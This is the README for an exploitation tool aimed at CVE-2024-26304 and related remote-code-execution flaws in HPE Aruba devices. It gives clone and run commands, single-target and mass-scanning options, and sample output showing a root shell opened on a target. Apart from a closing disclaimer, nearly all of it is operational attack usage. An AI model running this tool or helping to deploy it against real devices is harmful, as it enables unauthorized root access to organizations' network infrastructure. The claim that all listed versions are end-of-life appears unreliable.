Critical RCE Vulnerabilities in HPE Aruba Devices (may 2024)
This script is a powerful exploitation tool for the CVE-2024-26304, CVE-2024-26305, CVE-2024-33511, CVE-2024-33512 vulnerabilities found in specific versions of HPE Aruba Devices. It enables command execution and unauthorized access to the affected devices.
To set up the exploitation tool, follow these steps:
- Download the repository:
git clone https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits- Navigate to the tool's directory:
cd CVE-2024-26304-RCE-exploitsTo use the tool, run the script from the command line as follows:
python CVE-2024-26304.py [options]-
-u, --url: Specify the target URL or IP address.
-
-f, --file: Specify a file containing a list of URLs to scan.
-
-t, --threads: Set the number of threads for concurrent scanning.
-
-o, --output: Define an output file to save the scan results.
When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to open an interactive shell.
$ python3 CVE-2024-26304.py -u http://127.0.0.1
[+] Command executed successfully.
[!] http://127.0.0.1 is vulnerable to CVE-2024-26304: uid=0(root) gid=0(root)
[+] Opening interactive shell...
$ id
[+] Command executed successfully.
uid=0(root) gid=0(root)For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.
python CVE-2024-26304.py -f urls.txtThe vulnerability affects the:
- ArubaOS 10.5.1.0 and below
- ArubaOS 10.4.1.0 and below
- ArubaOS 8.11.2.1 and below
- ArubaOS 8.10.0.10 and below
- SD-WAN 8.7.0.0-2.3.0.x
- SD-WAN 8.6.0.4-2.2.x.x
These systems are considered to be end-of-life (EOL), meaning they are no longer supported or receiving updates from the manufacturer. It is strongly recommended that these systems are no longer used.
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.